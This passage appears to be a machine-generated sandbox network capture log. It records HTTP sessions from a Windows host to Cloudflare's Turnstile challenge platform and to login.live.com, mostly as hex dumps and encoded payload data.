                                                                                                                                                                                                                                2024-10-03 20:57:10 UTC1369INData Raw: 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 31 2e 35 31 26 4f 7c 48 3c 3c 31 2e 36 2c 64 5b 6a 48 28 37 30 36 29 5d 28 49 2c 64 5b 6a 48 28 38 37 31 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 48 28 31 34 34 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 6a 48 28 33 34 31 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 66 6f 72 28 4f 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 48 28 39 32 33 29 5d 28 48 3c 3c 31 2c 31 26 4f 29 2c 64 5b 6a 48 28 31 35 30 37 29 5d 28 49 2c 64 5b 6a 48 28 31 37 33 30 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 48 28 31 34 34 38 29 5d 28 64 5b 6a 48 28 34 32
                                                                                                                                                                                                                                Data Ascii: ,F),F++),delete B[C]}}else for(O=x[C],s=0;s<F;H=1.51&O|H<<1.6,d[jH(706)](I,d[jH(871)](j,1))?(I=0,G[jH(1448)](o(H)),H=0):I++,O>>=1,s++);D--,d[jH(341)](0,D)&&F++}for(O=2,s=0;s<F;H=d[jH(923)](H<<1,1&O),d[jH(1507)](I,d[jH(1730)](j,1))?(I=0,G[jH(1448)](d[jH(42


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.2.449799104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:10 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:11 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7d45f8543b1-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                41192.168.2.44980040.126.31.69443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                Expires: Thu, 03 Oct 2024 20:56:11 GMT
                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                x-ms-request-id: 99958d8f-4bb6-4539-938b-1d8f87760be3
                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0003FB33 V: 0
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:11 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 11409
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.2.449802104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3131
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 855664d3aeedc47
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:11 UTC3131OUTData Raw: 76 5f 38 63 63 66 64 37 63 35 64 65 65 39 33 32 66 34 3d 4b 77 34 30 74 30 79 30 77 30 78 30 76 7a 61 32 7a 61 4f 30 7a 62 2d 43 65 50 7a 5a 61 65 61 24 59 62 48 73 56 61 69 33 31 61 56 56 7a 70 61 55 61 6d 62 5a 43 46 56 35 61 5a 61 48 30 33 77 61 6c 6e 46 65 56 61 4c 61 70 56 2d 59 36 6d 7a 62 67 61 4b 61 61 67 77 61 55 30 61 77 46 76 7a 74 34 75 6c 61 47 4f 55 57 66 78 47 24 7a 67 61 63 61 52 79 74 6f 61 55 78 43 61 4a 61 33 57 73 74 57 53 63 69 4c 58 4e 58 78 30 5a 46 7a 33 61 5a 34 61 73 78 59 34 41 68 6d 6a 68 79 65 73 61 38 57 38 58 54 43 70 61 6f 79 59 61 52 34 52 7a 34 30 6f 34 61 61 24 69 61 2d 35 38 56 61 35 50 70 78 30 61 33 77 61 51 25 32 62 62 77 6c 64 64 73 38 65 56 61 58 30 75 4c 61 2d 68 6c 61 65 38 4b 78 56 2d 2b 61 75 77 52 61 48 67 58
                                                                                                                                                                                                                                Data Ascii: v_8ccfd7c5dee932f4=Kw40t0y0w0x0vza2zaO0zb-CePzZaea$YbHsVai31aVVzpaUambZCFV5aZaH03walnFeVaLapV-Y6mzbgaKaagwaU0awFvzt4ulaGOUWfxG$zgacaRytoaUxCaJa3WstWSciLXNXx0ZFz3aZ4asxY4Ahmjhyesa8W8XTCpaoyYaR4Rz40o4aa$ia-58Va5Ppx0a3waQ%2bbwldds8eVaX0uLa-hlae8KxV-+auwRaHgX
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:12 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 152128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: Ymm/YQlgY5ky+y35uK5GBBT8d/di9DovrIrnlOO7V8EZuAB2Jwn4uV0d1Tx/lLosZDDMnQHCjpjpqLA72YYecYHxQ2C+MmYAkwigcNwbTHX/RS1izIWqlay9p4SZj2dfvIYyHUCl6tzJzNTbFm4ywzZyoDXbdAIdLnzw+qKU9o4GqYTmg+P+PJC1CX5EaK4CD/EXntJ78g6sg3USLc4YJ2qSPV9yDOkgdtHTo8wRPpqr7vlcyOG4oumaGzEVL/QSUuPIiN6BD1/rAvz/H+rKqrRBTGdjrsttbz5bofP879PHSDqeISnVQBK+H/8P2uuLu2Gs/5WbkUDAmPjBDwOKOYzeE3lFqsU00+7ZvSRi59sdgQzYhGsEi75w1/EM46LVaXRfgOF22l2R+7dm2y1FcPlhUP3VoqUMPEhfPN7BMffIykbTGA2rs6mgPh9/60ZROpa8NYCvWaXiQ7PkmSKmh+Ozs6N5JP1vuzZtAgD9CI6cnJE=$b8c/DaHCtqbaT/dB
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7d9aa65de96-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC652INData Raw: 63 70 42 52 62 6d 4a 30 65 6d 74 7a 56 46 70 7a 69 35 74 33 67 32 42 36 6c 70 39 68 69 57 43 53 65 47 71 49 61 4b 74 74 70 61 53 73 72 49 74 30 6f 35 65 75 6d 61 36 6d 74 72 64 38 72 63 47 72 6b 4c 61 36 76 4c 36 7a 76 6f 71 4b 79 61 33 42 71 59 4c 4e 30 59 71 2b 79 70 4f 58 6c 71 58 61 70 64 54 65 30 74 66 59 30 61 44 61 33 65 48 61 34 64 44 68 6f 74 58 4b 31 73 58 67 32 75 61 75 38 73 7a 48 77 73 4c 76 30 73 4c 6e 78 62 7a 76 30 63 6e 41 38 39 62 31 31 66 50 61 43 75 6e 48 77 66 6e 57 32 64 6a 4a 32 75 37 76 7a 4e 37 79 39 50 58 55 32 75 38 5a 43 78 58 2b 44 75 76 32 32 2b 54 6a 46 66 76 6e 35 76 4c 6c 4b 68 77 61 4b 79 37 71 4c 69 73 48 46 44 63 78 39 52 51 6c 4e 41 38 72 43 43 76 2b 4d 67 4e 43 45 68 34 67 52 45 67 6e 4d 7a 77 46 43 69 55 47 4d 45 63
                                                                                                                                                                                                                                Data Ascii: cpBRbmJ0emtzVFpzi5t3g2B6lp9hiWCSeGqIaKttpaSsrIt0o5euma6mtrd8rcGrkLa6vL6zvoqKya3BqYLN0Yq+ypOXlqXapdTe0tfY0aDa3eHa4dDhotXK1sXg2uau8szHwsLv0sLnxbzv0cnA89b11fPaCunHwfnW2djJ2u7vzN7y9PXU2u8ZCxX+Duv22+TjFfvn5vLlKhwaKy7qLisHFDcx9RQlNA8rCCv+MgNCEh4gREgnMzwFCiUGMEc
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 58 6a 74 52 63 7a 6c 42 66 47 31 64 59 48 46 6f 58 34 78 43 69 6f 64 50 54 49 68 53 58 6c 39 7a 64 58 61 4a 6c 34 53 45 6b 35 35 7a 67 47 42 31 6b 35 70 33 66 35 32 50 68 58 79 65 71 36 65 4f 68 61 4a 71 62 61 6d 69 72 70 61 4b 69 6f 4f 32 72 4c 53 57 76 48 65 6f 6e 4c 58 42 67 5a 43 5a 73 61 61 66 74 70 69 6a 75 6f 32 76 72 71 4b 6d 77 70 47 54 6b 4b 75 73 72 35 43 7a 71 37 58 4a 73 4c 32 32 72 71 47 75 70 4e 79 35 33 2b 58 67 77 71 6e 72 75 37 62 42 37 63 58 50 35 38 54 4a 76 38 6a 4c 74 76 54 61 32 4f 76 78 76 66 58 63 30 64 48 63 32 64 34 42 43 75 62 5a 78 63 76 73 33 66 63 4f 33 41 4d 48 39 4e 55 54 36 41 4c 50 32 76 6f 50 2f 50 7a 61 32 68 51 4f 46 42 6b 59 41 65 63 52 36 41 63 5a 43 50 6b 68 4b 68 73 76 4b 51 59 49 42 2f 34 32 41 52 67 79 48 54 54
                                                                                                                                                                                                                                Data Ascii: XjtRczlBfG1dYHFoX4xCiodPTIhSXl9zdXaJl4SEk55zgGB1k5p3f52PhXyeq6eOhaJqbamirpaKioO2rLSWvHeonLXBgZCZsaaftpijuo2vrqKmwpGTkKusr5Czq7XJsL22rqGupNy53+Xgwqnru7bB7cXP58TJv8jLtvTa2OvxvfXc0dHc2d4BCubZxcvs3fcO3AMH9NUT6ALP2voP/Pza2hQOFBkYAecR6AcZCPkhKhsvKQYIB/42ARgyHTT
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 32 59 39 64 6c 6c 69 56 33 70 6a 61 6b 43 4a 67 6f 43 44 64 49 57 4a 6a 56 47 5a 54 33 6d 63 6a 46 32 4f 55 58 4f 5a 6a 5a 4b 6a 68 61 47 69 6d 34 42 30 65 32 53 66 61 57 70 6f 70 57 6c 6c 6b 70 43 32 67 48 68 76 75 48 69 76 66 62 79 56 75 34 78 34 77 71 47 30 67 4a 61 7a 71 49 69 31 6d 61 71 4e 6d 4b 36 6a 6f 38 53 6b 74 71 2b 4a 30 5a 69 72 73 64 76 53 73 64 76 56 6e 72 65 2f 7a 74 53 2f 74 61 4c 55 35 75 72 69 7a 75 71 38 71 38 69 73 76 4f 7a 57 73 4c 62 76 32 72 50 71 2b 2b 72 4e 41 63 36 36 76 4d 48 5a 39 64 37 39 32 64 50 5a 35 2b 72 36 33 66 63 4f 33 41 4d 48 39 4e 55 54 36 41 4c 50 32 76 6f 50 2f 50 7a 61 32 68 51 4f 46 42 6b 59 41 65 63 52 36 41 63 5a 43 50 6b 68 4b 68 73 7a 38 52 44 76 4b 7a 67 58 43 69 50 7a 47 69 55 6d 44 2f 59 35 4c 6a 34 5a
                                                                                                                                                                                                                                Data Ascii: 2Y9dlliV3pjakCJgoCDdIWJjVGZT3mcjF2OUXOZjZKjhaGim4B0e2SfaWpopWllkpC2gHhvuHivfbyVu4x4wqG0gJazqIi1maqNmK6jo8Sktq+J0ZirsdvSsdvVnre/ztS/taLU5urizuq8q8isvOzWsLbv2rPq++rNAc66vMHZ9d792dPZ5+r63fcO3AMH9NUT6ALP2voP/Pza2hQOFBkYAecR6AcZCPkhKhsz8RDvKzgXCiPzGiUmD/Y5Lj4Z
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 2b 44 57 6d 70 6b 66 6c 31 45 67 49 64 76 54 55 31 59 6c 35 56 52 55 35 32 5a 6a 49 32 63 57 57 78 64 58 35 79 47 66 57 4a 2f 6e 49 46 6d 71 59 71 4c 73 71 78 70 6c 57 32 4b 62 59 6d 70 65 62 43 52 76 72 6d 61 6c 38 4b 39 6d 70 4e 39 6d 6e 32 64 79 72 2b 56 74 61 53 76 78 4c 75 76 6b 63 4b 6a 78 35 4c 4f 78 38 4b 73 32 61 66 53 74 39 47 37 74 4b 7a 56 32 5a 79 7a 78 75 62 45 6f 35 32 30 70 73 2f 59 71 4b 79 78 72 66 43 78 73 72 50 70 30 4d 76 31 39 65 6d 37 78 39 66 4d 41 41 4c 52 31 4e 37 59 34 39 48 48 41 73 6e 38 34 67 7a 6e 42 2f 4c 51 45 51 72 33 39 51 51 4d 31 64 54 79 37 52 6a 33 44 50 45 50 48 79 4c 62 2b 41 58 66 34 2b 54 35 4a 78 6a 2b 44 54 4c 70 36 7a 55 46 4a 77 38 79 44 79 67 79 46 50 73 73 4c 52 7a 37 47 41 30 2b 41 43 39 48 51 42 34 44 52
                                                                                                                                                                                                                                Data Ascii: +DWmpkfl1EgIdvTU1Yl5VRU52ZjI2cWWxdX5yGfWJ/nIFmqYqLsqxplW2KbYmpebCRvrmal8K9mpN9mn2dyr+VtaSvxLuvkcKjx5LOx8Ks2afSt9G7tKzV2ZyzxubEo520ps/YqKyxrfCxsrPp0Mv19em7x9fMAALR1N7Y49HHAsn84gznB/LQEQr39QQM1dTy7Rj3DPEPHyLb+AXf4+T5Jxj+DTLp6zUFJw8yDygyFPssLRz7GA0+AC9HQB4DR
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 4a 54 49 4b 4b 6a 55 6c 74 6a 32 71 50 69 46 75 56 66 49 70 68 59 5a 4a 39 67 6d 56 64 5a 59 52 6c 64 70 65 4e 72 32 31 38 62 32 71 41 73 6d 31 78 68 49 46 31 68 49 69 57 76 4a 43 2b 72 33 4f 37 70 4a 61 45 6a 35 4b 47 70 72 72 45 70 4c 71 62 71 59 2f 49 77 38 57 2b 68 38 66 4c 30 72 47 30 7a 39 79 6d 6c 62 66 4f 71 35 6d 76 35 4c 32 7a 75 4d 53 6d 73 37 50 4d 77 64 66 48 33 63 79 6b 72 75 37 72 79 2b 66 57 36 64 76 56 7a 4f 36 36 32 64 6e 77 34 38 33 50 39 66 41 43 39 37 76 68 33 50 62 6b 42 75 4c 6c 42 38 34 41 41 67 7a 32 41 4f 76 54 39 75 62 39 31 66 55 52 38 76 51 6a 34 4f 38 41 46 41 62 6e 32 39 77 56 48 64 38 74 2f 69 66 74 48 2b 37 76 37 79 49 78 42 7a 6f 49 45 7a 73 64 50 68 34 64 4e 68 6b 68 45 77 34 76 4a 44 30 6e 43 7a 30 58 53 68 38 73 52 68
                                                                                                                                                                                                                                Data Ascii: JTIKKjUltj2qPiFuVfIphYZJ9gmVdZYRldpeNr218b2qAsm1xhIF1hIiWvJC+r3O7pJaEj5KGprrEpLqbqY/Iw8W+h8fL0rG0z9ymlbfOq5mv5L2zuMSms7PMwdfH3cykru7ry+fW6dvVzO662dnw483P9fAC97vh3PbkBuLlB84AAgz2AOvT9ub91fUR8vQj4O8AFAbn29wVHd8t/iftH+7v7yIxBzoIEzsdPh4dNhkhEw4vJD0nCz0XSh8sRh
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 68 6e 68 58 6b 58 35 32 6c 6e 39 64 64 4a 68 6b 59 32 35 32 59 58 75 54 67 6e 79 73 71 70 43 51 66 70 43 45 67 6f 36 54 73 59 4f 71 71 71 36 7a 73 33 53 36 6a 33 36 41 77 62 71 46 66 38 43 43 6b 63 75 67 79 72 6e 4a 6a 73 71 6d 78 5a 2f 53 69 36 33 43 74 39 6d 35 72 72 48 64 30 4d 6e 61 6f 64 75 61 35 4e 2f 58 34 75 6e 5a 75 71 69 65 77 74 6a 6b 75 36 72 74 77 4d 72 30 79 4d 66 30 37 74 76 59 36 72 33 7a 2f 66 4b 2f 2f 74 73 47 41 75 4c 54 78 73 4c 44 77 67 33 70 36 38 2f 4d 37 77 59 4f 44 65 66 6d 30 67 38 4f 46 41 66 59 38 39 76 70 2f 65 37 65 2f 67 49 65 46 50 30 46 34 42 38 69 49 42 72 39 37 2b 30 67 45 76 7a 72 43 78 55 71 45 43 34 53 4a 76 6f 6f 47 42 49 7a 50 42 55 41 46 6b 63 42 4a 79 51 72 47 6a 77 59 51 44 6b 63 50 67 52 51 4c 30 77 79 4b 78 42
                                                                                                                                                                                                                                Data Ascii: hnhXkX52ln9ddJhkY252YXuTgnysqpCQfpCEgo6TsYOqqq6zs3S6j36AwbqFf8CCkcugyrnJjsqmxZ/Si63Ct9m5rrHd0Mnaodua5N/X4unZuqiewtjku6rtwMr0yMf07tvY6r3z/fK//tsGAuLTxsLDwg3p68/M7wYODefm0g8OFAfY89vp/e7e/gIeFP0F4B8iIBr97+0gEvzrCxUqEC4SJvooGBIzPBUAFkcBJyQrGjwYQDkcPgRQL0wyKxB
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 70 36 51 58 56 78 74 58 57 42 67 67 6e 71 71 5a 58 65 59 72 57 6c 6f 69 6e 46 71 71 48 47 55 74 59 43 6d 64 4c 75 4e 72 72 52 2f 67 4a 6c 2f 67 4d 47 35 6e 63 47 66 6c 6f 65 66 77 63 43 35 75 38 6e 50 75 73 2b 66 6a 39 4f 6c 75 62 6e 57 6b 61 6d 71 33 61 7a 68 6d 2b 43 65 30 4f 4c 6d 74 75 47 62 32 74 2f 57 71 4b 54 44 72 64 48 6d 33 62 4c 49 30 63 4c 6b 31 76 4c 77 78 66 47 2b 79 2f 62 53 2b 41 58 61 38 2f 65 2f 33 76 55 41 2b 76 33 6f 41 4f 76 65 2b 75 62 6a 38 4f 33 67 42 2b 4c 51 46 50 67 52 33 66 49 68 2f 52 7a 73 39 76 66 65 4b 42 67 44 42 65 66 36 36 66 58 37 35 76 6a 6f 38 65 38 7a 44 2f 34 46 4a 43 58 77 44 52 77 4b 47 77 77 63 50 52 59 51 4a 42 64 48 47 6b 41 56 53 6b 6b 66 53 41 45 71 4a 79 4d 39 4a 41 38 72 4e 43 63 58 57 44 41 53 4e 68 6f 65
                                                                                                                                                                                                                                Data Ascii: p6QXVxtXWBggnqqZXeYrWloinFqqHGUtYCmdLuNrrR/gJl/gMG5ncGfloefwcC5u8nPus+fj9OlubnWkamq3azhm+Ce0OLmtuGb2t/WqKTDrdHm3bLI0cLk1vLwxfG+y/bS+AXa8/e/3vUA+v3oAOve+ubj8O3gB+LQFPgR3fIh/Rzs9vfeKBgDBef66fX75vjo8e8zD/4FJCXwDRwKGwwcPRYQJBdHGkAVSkkfSAEqJyM9JA8rNCcXWDASNhoe
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 4a 68 61 4a 2b 41 6c 59 42 35 62 59 79 74 6e 34 65 6e 6b 6e 57 69 6a 6f 31 33 74 71 65 6f 73 70 47 78 69 37 71 69 76 61 43 6b 66 4d 6a 44 6c 4a 57 6c 69 4d 79 76 79 49 75 66 6b 4c 79 51 7a 4b 6a 54 7a 4e 4c 44 32 39 4b 61 79 39 2b 37 72 4d 44 64 32 64 43 76 79 4d 48 43 74 75 50 6e 75 4d 48 68 32 4e 76 4f 71 62 4f 79 72 73 66 45 35 38 58 59 35 39 48 54 2b 73 43 36 34 37 37 75 30 74 66 67 39 73 66 45 35 73 7a 33 37 65 6e 66 41 77 50 52 45 63 76 65 35 77 76 53 38 38 30 62 44 52 6f 4e 39 78 30 56 41 67 59 57 39 52 41 62 39 67 6f 4e 34 68 73 41 4a 2b 34 79 4a 79 63 4b 48 79 77 4e 42 77 6f 54 4b 6a 59 57 43 54 38 65 46 2f 51 54 52 69 59 33 47 54 4d 49 48 6b 6f 38 54 67 6b 50 45 43 73 4e 44 43 30 2f 45 53 77 51 56 30 6c 51 57 78 78 41 59 43 78 58 49 43 38 6a 59
                                                                                                                                                                                                                                Data Ascii: JhaJ+AlYB5bYytn4enknWijo13tqeospGxi7qivaCkfMjDlJWliMyvyIufkLyQzKjTzNLD29Kay9+7rMDd2dCvyMHCtuPnuMHh2NvOqbOyrsfE58XY59HT+sC6477u0tfg9sfE5sz37enfAwPREcve5wvS880bDRoN9x0VAgYW9RAb9goN4hsAJ+4yJycKHywNBwoTKjYWCT8eF/QTRiY3GTMIHko8TgkPECsNDC0/ESwQV0lQWxxAYCxXIC8jY
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC1369INData Raw: 67 71 58 32 6c 71 35 31 38 71 49 2b 6e 6a 61 61 32 6c 62 75 6e 75 4c 70 2f 6d 4b 6d 6a 73 58 2b 56 76 63 4b 53 6c 71 53 6c 6e 73 62 44 76 4b 75 5a 72 4a 33 4c 79 64 43 73 6d 4b 71 77 31 4c 48 46 6d 72 2f 62 7a 35 6a 4e 34 4b 57 6a 31 72 7a 46 36 4b 61 69 76 37 2b 33 30 4c 7a 79 34 75 47 77 77 39 54 34 7a 72 4c 4a 37 4f 32 36 30 76 7a 53 7a 51 50 4e 35 4f 37 5a 31 2f 72 67 42 51 37 6d 31 39 6a 39 37 63 72 73 36 76 54 7a 38 4f 34 48 44 76 41 4b 2b 50 76 38 44 50 37 75 34 50 55 44 2f 42 51 6a 38 66 4c 2b 4c 4f 67 73 49 76 72 6a 49 51 66 75 39 43 49 31 4c 66 45 70 43 44 45 49 4f 44 48 36 50 7a 78 44 2f 42 4d 61 52 51 52 42 48 54 51 46 50 69 45 4a 55 55 6c 4c 55 41 31 4a 46 45 42 50 56 55 52 4c 57 7a 56 66 47 32 49 67 46 54 56 57 58 69 46 6b 47 32 5a 46 56 6a
                                                                                                                                                                                                                                Data Ascii: gqX2lq518qI+njaa2lbunuLp/mKmjsX+VvcKSlqSlnsbDvKuZrJ3LydCsmKqw1LHFmr/bz5jN4KWj1rzF6Kaiv7+30Lzy4uGww9T4zrLJ7O260vzSzQPN5O7Z1/rgBQ7m19j97crs6vTz8O4HDvAK+Pv8DP7u4PUD/BQj8fL+LOgsIvrjIQfu9CI1LfEpCDEIODH6PzxD/BMaRQRBHTQFPiEJUUlLUA1JFEBPVURLWzVfG2IgFTVWXiFkG2ZFVj


